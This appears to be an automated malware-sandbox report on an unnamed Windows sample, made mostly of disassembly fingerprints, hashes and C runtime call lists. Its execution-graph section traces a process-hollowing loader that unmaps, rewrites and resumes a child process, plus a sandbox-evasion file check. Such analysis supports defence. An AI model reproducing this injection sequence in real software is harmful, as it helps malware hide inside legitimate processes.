            Memory Dump Source
            • Source File: 00000005.00000002.2271536703.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_2230000_file.jbxd
            Yara matches
            Similarity
            • API ID: Exception@8Throw$_memset_sprintf
            • String ID:
            • API String ID: 217217746-0
            • Opcode ID: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
            • Instruction ID: 67efcb6a86c8f0ebcbd69a0ef8903d8d7886842a72e2b85c074cb1fd59af618f
            • Opcode Fuzzy Hash: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
            • Instruction Fuzzy Hash: E05173B2D50209AADF21DFE1DD45FEEBBB9FB04704F200129F905B6184E77469058BA4
            APIs
            Memory Dump Source
            • Source File: 00000005.00000002.2271536703.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_2230000_file.jbxd
            Yara matches
            Similarity
            • API ID: __getenv_helper_nolock$__getptd_noexit__invoke_watson__lock_strlen_strnlen
            • String ID:
            • API String ID: 3534693527-0
            • Opcode ID: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
            • Instruction ID: 19c6dc87b03f86396a01aaf8765a1d202acf8a395219c2b26f4bcf550115c067
            • Opcode Fuzzy Hash: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
            • Instruction Fuzzy Hash: 9E31F432938332EADB217EE4CC00B6E6795AF55B24F108215ED04EB29CDB748540CAB1
            APIs
            • __getptd_noexit.LIBCMT ref: 022F66DD
              • Part of subcall function 022559BF: __calloc_crt.LIBCMT ref: 022559E2
              • Part of subcall function 022559BF: __initptd.LIBCMT ref: 02255A04
            • __calloc_crt.LIBCMT ref: 022F6700
            • __get_sys_err_msg.LIBCMT ref: 022F671E
            • __invoke_watson.LIBCMT ref: 022F673B
            • __get_sys_err_msg.LIBCMT ref: 022F676D
            • __invoke_watson.LIBCMT ref: 022F678B
            Memory Dump Source
            • Source File: 00000005.00000002.2271536703.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_2230000_file.jbxd
            Yara matches
            Similarity
            • API ID: __calloc_crt__get_sys_err_msg__invoke_watson$__getptd_noexit__initptd
            • String ID:
            • API String ID: 4066021419-0
            • Opcode ID: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
            • Instruction ID: 2ed4ac4be7ed269da9b92aeab2fbc1848a98993b9c486297d20aad4572720ff2
            • Opcode Fuzzy Hash: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
            • Instruction Fuzzy Hash: 0B11B2326207256BEB617EE59C00BBBF39DDF00765B004436FE2896248E735DD408AE4
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000005.00000002.2271536703.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_2230000_file.jbxd
            Yara matches
            Similarity
            • API ID: _memset
            • String ID: D
            • API String ID: 2102423945-2746444292
            • Opcode ID: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
            • Instruction ID: 84b323fa707e1da0b9ef26722cccd563b4b50e046c513c9cbbbdbdb9805dd8fa
            • Opcode Fuzzy Hash: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
            • Instruction Fuzzy Hash: FDE16C71D1021AEACF28DFE1CD49FEEB7B8BF04304F144169E909A6194EB74AA45CF54
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000005.00000002.2271536703.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_2230000_file.jbxd
            Yara matches
            Similarity
            • API ID: _memset
            • String ID: $$$(
            • API String ID: 2102423945-3551151888
            • Opcode ID: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
            • Instruction ID: 981b111b083f47d21a4a69629f22b3cc7458d3bfb57fca88c7bb567c9022173d
            • Opcode Fuzzy Hash: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
            • Instruction Fuzzy Hash: 0E918BB1D10219EAEF21DFE0CC49BEEBBB9AF05304F244169D40577284DBB65A48CFA5
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000005.00000002.2271536703.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_2230000_file.jbxd
            Yara matches
            Similarity
            • API ID: _wcsnlen
            • String ID: U
            • API String ID: 3628947076-3372436214
            • Opcode ID: ddbdfe4e8834e254b395da421ec3c28ac3be050359a4b81b0499ab3bd56dfaa9
            • Instruction ID: 9714f3eddca0c9865312de31f85f3160684ed3dae4a470a2a9fcca9f9f1a32b0
            • Opcode Fuzzy Hash: ddbdfe4e8834e254b395da421ec3c28ac3be050359a4b81b0499ab3bd56dfaa9
            • Instruction Fuzzy Hash: 77215B33238329AAEB009BE4AC44BBE739DDB45350F908165FD08C6198FF71E9508AA4
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000005.00000002.2271536703.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_2230000_file.jbxd
            Yara matches
            Similarity
            • API ID: _memset
            • String ID: p2Q
            • API String ID: 2102423945-1521255505
            • Opcode ID: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
            • Instruction ID: 6ca8c146b9e77374386af4ccfc87ff9b8057c3a76163d931eb717c0674dd610a
            • Opcode Fuzzy Hash: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
            • Instruction Fuzzy Hash: 0FF0E578695750A5F7117790BC267857D917B31B09F108044E5142E2E5D3FD234C6B99
            APIs
            • std::exception::exception.LIBCMT ref: 0227FBF1
              • Part of subcall function 0226169C: std::exception::_Copy_str.LIBCMT ref: 022616B5
            • __CxxThrowException@8.LIBCMT ref: 0227FC06
            Strings
            Memory Dump Source
            • Source File: 00000005.00000002.2271536703.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_2230000_file.jbxd
            Yara matches
            Similarity
            • API ID: Copy_strException@8Throwstd::exception::_std::exception::exception
            • String ID: TeM$TeM
            • API String ID: 3662862379-3870166017
            • Opcode ID: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
            • Instruction ID: 7e3629821c04addec904b45f97ee8fb7dee2fb10168117dfe82acf690b0f0462
            • Opcode Fuzzy Hash: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
            • Instruction Fuzzy Hash: 67D01779C0030CBBCB00EFA4D449CDDBBB8AA00304B008462A91897244EA74A3898FC4
            APIs
              • Part of subcall function 0225197D: __wfsopen.LIBCMT ref: 02251988
            • _fgetws.LIBCMT ref: 0223D15C
            Memory Dump Source
            • Source File: 00000005.00000002.2271536703.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_2230000_file.jbxd
            Yara matches
            Similarity
            • API ID: __wfsopen_fgetws
            • String ID:
            • API String ID: 853134316-0
            • Opcode ID: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
            • Instruction ID: a26b67188050d134ef76b4e5d9a4df2d1f40b942bfc2d8401ce3ac5807fc2bfb
            • Opcode Fuzzy Hash: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
            • Instruction Fuzzy Hash: A991C3B2D2031AABCF22DFE4CC847AEB7B5BF04304F144529E815A7245E7B5AA14CF91
            APIs
            Memory Dump Source
            • Source File: 00000005.00000002.2271536703.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_2230000_file.jbxd
            Yara matches
            Similarity
            • API ID: _malloc$__except_handler4_fprintf
            • String ID:
            • API String ID: 1783060780-0
            • Opcode ID: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
            • Instruction ID: 9a56ce7d285c602e3340d13276e8fb2198a66aeee00214538cc49195d89feae5
            • Opcode Fuzzy Hash: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
            • Instruction Fuzzy Hash: 49A18DB0C10358EBEF11EFE4DC45BEEBB76AF14304F144128D80576295D7B69A48CBA6
            APIs
            Memory Dump Source
            • Source File: 00000005.00000002.2271536703.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_2230000_file.jbxd
            Yara matches
            Similarity
            • API ID: _memset$__filbuf__getptd_noexit__read_nolock
            • String ID:
            • API String ID: 2974526305-0
            • Opcode ID: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
            • Instruction ID: 9e452ffa5948a834d4fb1187676ea088b2d972b1d6739e266d16df74cbeeb60b
            • Opcode Fuzzy Hash: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
            • Instruction Fuzzy Hash: 3D51A170A20726DBDB288FF9888466EB7B6BF40325F14C729FC35962D8D7B19950CB40
            APIs
            Memory Dump Source
            • Source File: 00000005.00000002.2271536703.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_2230000_file.jbxd
            Yara matches
            Similarity
            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
            • String ID:
            • API String ID: 3016257755-0
            • Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
            • Instruction ID: 98435e26e9a2265e25363c3bf857d03c787615116b1e260b73bccfe5fc7a2c99
            • Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
            • Instruction Fuzzy Hash: C401483242824ABBCF125EC4DC01CEE3F67BF19355B488415FA6D58978D376C5B2AB81
            APIs
            • ___BuildCatchObject.LIBCMT ref: 022F7A4B
              • Part of subcall function 022F8140: ___BuildCatchObjectHelper.LIBCMT ref: 022F8172
              • Part of subcall function 022F8140: ___AdjustPointer.LIBCMT ref: 022F8189
            • _UnwindNestedFrames.LIBCMT ref: 022F7A62
            • ___FrameUnwindToState.LIBCMT ref: 022F7A74
            • CallCatchBlock.LIBCMT ref: 022F7A98
            Memory Dump Source
            • Source File: 00000005.00000002.2271536703.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_2230000_file.jbxd
            Yara matches
            Similarity
            • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
            • String ID:
            • API String ID: 2901542994-0
            • Opcode ID: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
            • Instruction ID: 6129c954fc954ace5770ca80c71ed9352d65e8c85fe393d98bf9a7fa764c6e83
            • Opcode Fuzzy Hash: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
            • Instruction Fuzzy Hash: 6F012D32010209BBCF52AF95DC00EEABBBAFF48754F158024FE1865124C736E961DFA0

            Execution Graph

            Execution Coverage:1.1%
            Dynamic/Decrypted Code Coverage:100%
            Signature Coverage:0%
            Total number of Nodes:38
            Total number of Limit Nodes:8
            execution_graph 33584 2330000 33587 2330630 33584->33587 33586 2330005 33588 233064c 33587->33588 33590 2331577 33588->33590 33593 23305b0 33590->33593 33596 23305dc 33593->33596 33594 23305e2 GetFileAttributesA 33594->33596 33595 233061e 33596->33594 33596->33595 33598 2330420 33596->33598 33599 23304f3 33598->33599 33600 23304fa 33599->33600 33601 23304ff CreateWindowExA 33599->33601 33600->33596 33601->33600 33602 2330540 PostMessageA 33601->33602 33603 233055f 33602->33603 33603->33600 33605 2330110 VirtualAlloc GetModuleFileNameA 33603->33605 33606 2330414 33605->33606 33607 233017d CreateProcessA 33605->33607 33606->33603 33607->33606 33609 233025f VirtualFree VirtualAlloc Wow64GetThreadContext 33607->33609 33609->33606 33610 23302a9 ReadProcessMemory 33609->33610 33611 23302e5 VirtualAllocEx NtWriteVirtualMemory 33610->33611 33612 23302d5 NtUnmapViewOfSection 33610->33612 33613 233033b 33611->33613 33612->33611 33614 2330350 NtWriteVirtualMemory 33613->33614 33615 233039d WriteProcessMemory Wow64SetThreadContext ResumeThread 33613->33615 33614->33613 33616 23303fb ExitProcess 33615->33616 33618 2183026 33619 2183035 33618->33619 33622 21837c6 33619->33622 33627 21837e1 33622->33627 33623 21837ea CreateToolhelp32Snapshot 33624 2183806 Module32First 33623->33624 33623->33627 33625 2183815 33624->33625 33628 218303e 33624->33628 33629 2183485 33625->33629 33627->33623 33627->33624 33630 21834b0 33629->33630 33631 21834c1 VirtualAlloc 33630->33631 33632 21834f9 33630->33632 33631->33632

            Control-flow Graph

            APIs
            • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 02330156
            • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 0233016C
            • CreateProcessA.KERNELBASE(?,00000000), ref: 02330255
            • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 02330270
            • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 02330283
            • Wow64GetThreadContext.KERNEL32(00000000,?), ref: 0233029F
            • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 023302C8
            • NtUnmapViewOfSection.NTDLL(00000000,?), ref: 023302E3
            • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 02330304
            • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 0233032A
            • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 02330399
            • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 023303BF
            • Wow64SetThreadContext.KERNEL32(00000000,?), ref: 023303E1
            • ResumeThread.KERNELBASE(00000000), ref: 023303ED
            • ExitProcess.KERNEL32(00000000), ref: 02330412
            Memory Dump Source
            • Source File: 00000006.00000002.2456931557.0000000002330000.00000040.00001000.00020000.00000000.sdmp, Offset: 02330000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_2330000_file.jbxd
            Yara matches
            Similarity
            • API ID: Virtual$MemoryProcess$AllocThreadWrite$ContextWow64$CreateExitFileFreeModuleNameReadResumeSectionUnmapView
            • String ID:
            • API String ID: 93872480-0
            • Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
            • Instruction ID: 03fe60efa974c3b93b77023aed0812915bd07aadd41b5e14eeea7c8a737913e0
            • Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
            • Instruction Fuzzy Hash: 23B1C774A00208AFDB44CF98C895F9EBBB5FF88314F248158E549AB391D771AE41CF94

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 15 2330420-23304f8 17 23304fa 15->17 18 23304ff-233053c CreateWindowExA 15->18 19 23305aa-23305ad 17->19 20 2330540-2330558 PostMessageA 18->20 21 233053e 18->21 22 233055f-2330563 20->22 21->19 22->19 23 2330565-2330579 22->23 23->19 25 233057b-2330582 23->25 26 2330584-2330588 25->26 27 23305a8 25->27 26->27 28 233058a-2330591 26->28 27->22 28->27 29 2330593-2330597 call 2330110 28->29 31 233059c-23305a5 29->31 31->27
            APIs
            • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 02330533
            Strings
            Memory Dump Source
            • Source File: 00000006.00000002.2456931557.0000000002330000.00000040.00001000.00020000.00000000.sdmp, Offset: 02330000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_2330000_file.jbxd
            Yara matches
            Similarity
            • API ID: CreateWindow
            • String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
            • API String ID: 716092398-2341455598
            • Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
            • Instruction ID: b3e5c61d64747ccc7b4c42b05ae31c5cddc3785b0a769039274b0e5785a9ae93
            • Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
            • Instruction Fuzzy Hash: 4E511870D083C8DAEB16CBE8C849BDDBFB6AF11708F144058D5447F286C3BA5659CB66

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 32 23305b0-23305d5 33 23305dc-23305e0 32->33 34 23305e2-23305f5 GetFileAttributesA 33->34 35 233061e-2330621 33->35 36 2330613-233061c 34->36 37 23305f7-23305fe 34->37 36->33 37->36 38 2330600-233060b call 2330420 37->38 40 2330610 38->40 40->36
            APIs
            • GetFileAttributesA.KERNELBASE(apfHQ), ref: 023305EC
            Strings
            Memory Dump Source
            • Source File: 00000006.00000002.2456931557.0000000002330000.00000040.00001000.00020000.00000000.sdmp, Offset: 02330000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_2330000_file.jbxd
            Yara matches
            Similarity
            • API ID: AttributesFile
            • String ID: apfHQ$o
            • API String ID: 3188754299-2999369273
            • Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
            • Instruction ID: 98e4d5cf277515cf2ac055b13c6f3fe1ba622360f7447c3b5a8ae5c76c592c4f
            • Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
            • Instruction Fuzzy Hash: 72012170C0425CEEDF19DB98C5183AEBFB5AF41308F1480D9C4592B242D7769B58CBA1

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 41 21837c6-21837df 42 21837e1-21837e3 41->42 43 21837ea-21837f6 CreateToolhelp32Snapshot 42->43 44 21837e5 42->44 45 21837f8-21837fe 43->45 46 2183806-2183813 Module32First 43->46 44->43 45->46 51 2183800-2183804 45->51 47 218381c-2183824 46->47 48 2183815-2183816 call 2183485 46->48 52 218381b 48->52 51->42 51->46 52->47
            APIs
            • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 021837EE
            • Module32First.KERNEL32(00000000,00000224), ref: 0218380E
            Memory Dump Source
            • Source File: 00000006.00000002.2455882872.0000000002183000.00000040.00000020.00020000.00000000.sdmp, Offset: 02183000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_2183000_file.jbxd
            Yara matches
            Similarity
            • API ID: CreateFirstModule32SnapshotToolhelp32
            • String ID:
            • API String ID: 3833638111-0
            • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
            • Instruction ID: da2cc9593f55308d16108b1f274b12c47887c59a6ba86efd7a14aa5830244c86
            • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
            • Instruction Fuzzy Hash: CBF096312407106FD7203BF5A8CDB6EB6E8EF49A25F1406B8E652910C0DB74E8458E61

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 54 2183485-21834bf call 2183798 57 218350d 54->57 58 21834c1-21834f4 VirtualAlloc call 2183512 54->58 57->57 60 21834f9-218350b 58->60 60->57
            APIs
            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 021834D6
            Memory Dump Source
            • Source File: 00000006.00000002.2455882872.0000000002183000.00000040.00000020.00020000.00000000.sdmp, Offset: 02183000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_2183000_file.jbxd
            Yara matches
            Similarity
            • API ID: AllocVirtual
            • String ID:
            • API String ID: 4275171209-0
            • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
            • Instruction ID: be7f40b923d3595b88006978ba0089a09547c1e9ba41179752bac28a7faf12d9
            • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
            • Instruction Fuzzy Hash: 7B112B79A40208EFDB01DF98C985E99BBF5AF08750F098094F9589B361D375EA90DF80

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 551 2356437-2356440 552 2356466 551->552 553 2356442-2356446 551->553 555 2356468-235646b 552->555 553->552 554 2356448-2356459 call 2359636 553->554 558 235646c-235647d call 2359636 554->558 559 235645b-2356460 call 2355ba8 554->559 564 235647f-2356480 call 235158d 558->564 565 2356488-235649a call 2359636 558->565 559->552 569 2356485-2356486 564->569 570 23564ac-23564cd call 2355f4c call 2356837 565->570 571 235649c-23564aa call 235158d * 2 565->571 569->559 580 23564e2-2356500 call 235158d call 2354edc call 2354d82 call 235158d 570->580 581 23564cf-23564dd call 235557d 570->581 571->569 590 2356507-2356509 580->590 586 2356502-2356505 581->586 587 23564df 581->587 586->590 587->580 590->555
            APIs
            Memory Dump Source
            • Source File: 00000006.00000002.2456931557.0000000002330000.00000040.00001000.00020000.00000000.sdmp, Offset: 02330000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_2330000_file.jbxd
            Yara matches
            Similarity
            • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock
            • String ID:
            • API String ID: 1442030790-0
            • Opcode ID: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
            • Instruction ID: a4a64580e9703323c2af7b233f03497b25cfcc251d6ba0c995196dc930e7689d
            • Opcode Fuzzy Hash: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
            • Instruction Fuzzy Hash: 1B21C075204630EEEB317F65DC02E0B7BEEDF41760BA08829EC8D564A4EB729950CF91

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 595 2353f16-2353f2f 596 2353f31-2353f3b call 2355ba8 call 2354c72 595->596 597 2353f49-2353f5e call 235bdc0 595->597 606 2353f40 596->606 597->596 602 2353f60-2353f63 597->602 604 2353f65 602->604 605 2353f77-2353f7d 602->605 607 2353f67-2353f69 604->607 608 2353f6b-2353f75 call 2355ba8 604->608 609 2353f7f 605->609 610 2353f89-2353f9a call 2360504 call 23601a3 605->610 611 2353f42-2353f48 606->611 607->605 607->608 608->606 609->608 613 2353f81-2353f87 609->613 619 2354185-235418f call 2354c9d 610->619 620 2353fa0-2353fac call 23601cd 610->620 613->608 613->610 620->619 625 2353fb2-2353fbe call 23601f7 620->625 625->619 628 2353fc4-2353fcb 625->628 629 2353fcd 628->629 630 235403b-2354046 call 23602d9 628->630 632 2353fd7-2353ff3 call 23602d9 629->632 633 2353fcf-2353fd5 629->633 630->611 636 235404c-235404f 630->636 632->611 640 2353ff9-2353ffc 632->640 633->630 633->632 638 2354051-235405a call 2360554 636->638 639 235407e-235408b 636->639 638->639 648 235405c-235407c 638->648 642 235408d-235409c call 2360f40 639->642 643 2354002-235400b call 2360554 640->643 644 235413e-2354140 640->644 651 235409e-23540a6 642->651 652 23540a9-23540d0 call 2360e90 call 2360f40 642->652 643->644 653 2354011-2354029 call 23602d9 643->653 644->611 648->642 651->652 661 23540d2-23540db 652->661 662 23540de-2354105 call 2360e90 call 2360f40 652->662 653->611 658 235402f-2354036 653->658 658->644 661->662 667 2354107-2354110 662->667 668 2354113-2354122 call 2360e90 662->668 667->668 671 2354124 668->671 672 235414f-2354168 668->672 675 2354126-2354128 671->675 676 235412a-2354138 671->676 673 235413b 672->673 674 235416a-2354183 672->674 673->644 674->644 675->676 677 2354145-2354147 675->677 676->673 677->644 678 2354149 677->678 678->672 679 235414b-235414d 678->679 679->644 679->672
            APIs
            • _memset.LIBCMT ref: 02353F51
              • Part of subcall function 02355BA8: __getptd_noexit.LIBCMT ref: 02355BA8
            • __gmtime64_s.LIBCMT ref: 02353FEA
            • __gmtime64_s.LIBCMT ref: 02354020
            • __gmtime64_s.LIBCMT ref: 0235403D
            • __allrem.LIBCMT ref: 02354093
            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 023540AF
            • __allrem.LIBCMT ref: 023540C6
            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 023540E4
            • __allrem.LIBCMT ref: 023540FB
            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02354119
            • __invoke_watson.LIBCMT ref: 0235418A
            Memory Dump Source
            • Source File: 00000006.00000002.2456931557.0000000002330000.00000040.00001000.00020000.00000000.sdmp, Offset: 02330000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_2330000_file.jbxd
            Yara matches
            Similarity
            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
            • String ID:
            • API String ID: 384356119-0
            • Opcode ID: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
            • Instruction ID: 03e3aed0f6ec56207be7c604bd2217c0ef9a557e3b7bc2f65b670db5cd19468b
            • Opcode Fuzzy Hash: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
            • Instruction Fuzzy Hash: 5171EB71A00726ABD7289F79CC45F6AB3B9BF10764F148179ED18E7680E770DA418BD0

            Control-flow Graph

            APIs
            Memory Dump Source
            • Source File: 00000006.00000002.2456931557.0000000002330000.00000040.00001000.00020000.00000000.sdmp, Offset: 02330000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_2330000_file.jbxd
            Yara matches
            Similarity
            • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__invoke_watson_wcscmp
            • String ID:
            • API String ID: 3432600739-0
            • Opcode ID: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
            • Instruction ID: 5678e05fb381da1d1bc54039c9617cf876bd973ef2e24c8440d5c99d5acaa479
            • Opcode Fuzzy Hash: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
            • Instruction Fuzzy Hash: 2F410232904324EFDB20AFA4D942F9E7BFAAF44314F50442DEE0C56190CB759584DF51

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 744 23584ab-23584d9 call 2358477 749 23584f3-235850b call 235158d 744->749 750 23584db-23584de 744->750 757 2358524-235855a call 235158d * 3 749->757 758 235850d-235850f 749->758 751 23584e0-23584eb call 235158d 750->751 752 23584ed 750->752 751->750 751->752 752->749 769 235855c-2358562 757->769 770 235856b-235857e 757->770 759 2358511-235851c call 235158d 758->759 760 235851e 758->760 759->758 759->760 760->757 769->770 771 2358564-235856a call 235158d 769->771 775 2358580-2358587 call 235158d 770->775 776 235858d-2358594 770->776 771->770 775->776 777 2358596-235859d call 235158d 776->777 778 23585a3-23585ae 776->778 777->778 781 23585b0-23585bc 778->781 782 23585cb-23585cd 778->782 781->782 785 23585be-23585c5 call 235158d 781->785 785->782
            APIs
            Memory Dump Source
            • Source File: 00000006.00000002.2456931557.0000000002330000.00000040.00001000.00020000.00000000.sdmp, Offset: 02330000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_2330000_file.jbxd
            Yara matches
            Similarity
            • API ID: _free$ExitProcess___crt
            • String ID:
            • API String ID: 1022109855-0
            • Opcode ID: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
            • Instruction ID: 51e7b4532f4511715abff41cc70e02f8e30adaaac2a353d5cc8f8b402cfb7974
            • Opcode Fuzzy Hash: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
            • Instruction Fuzzy Hash: 6331E335900274EFDB21AF14FC80D9977A6FB143243148A2AED4C572B0CBF059C9AF90
            APIs
            • std::exception::exception.LIBCMT ref: 0237FC1F
              • Part of subcall function 0236169C: std::exception::_Copy_str.LIBCMT ref: 023616B5
            • __CxxThrowException@8.LIBCMT ref: 0237FC34
            • std::exception::exception.LIBCMT ref: 0237FC4D
            • __CxxThrowException@8.LIBCMT ref: 0237FC62
            • std::regex_error::regex_error.LIBCPMT ref: 0237FC74
              • Part of subcall function 0237F914: std::exception::exception.LIBCMT ref: 0237F92E
            • __CxxThrowException@8.LIBCMT ref: 0237FC82
            • std::exception::exception.LIBCMT ref: 0237FC9B
            • __CxxThrowException@8.LIBCMT ref: 0237FCB0
            Strings
            Memory Dump Source
            • Source File: 00000006.00000002.2456931557.0000000002330000.00000040.00001000.00020000.00000000.sdmp, Offset: 02330000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_2330000_file.jbxd
            Yara matches
            Similarity
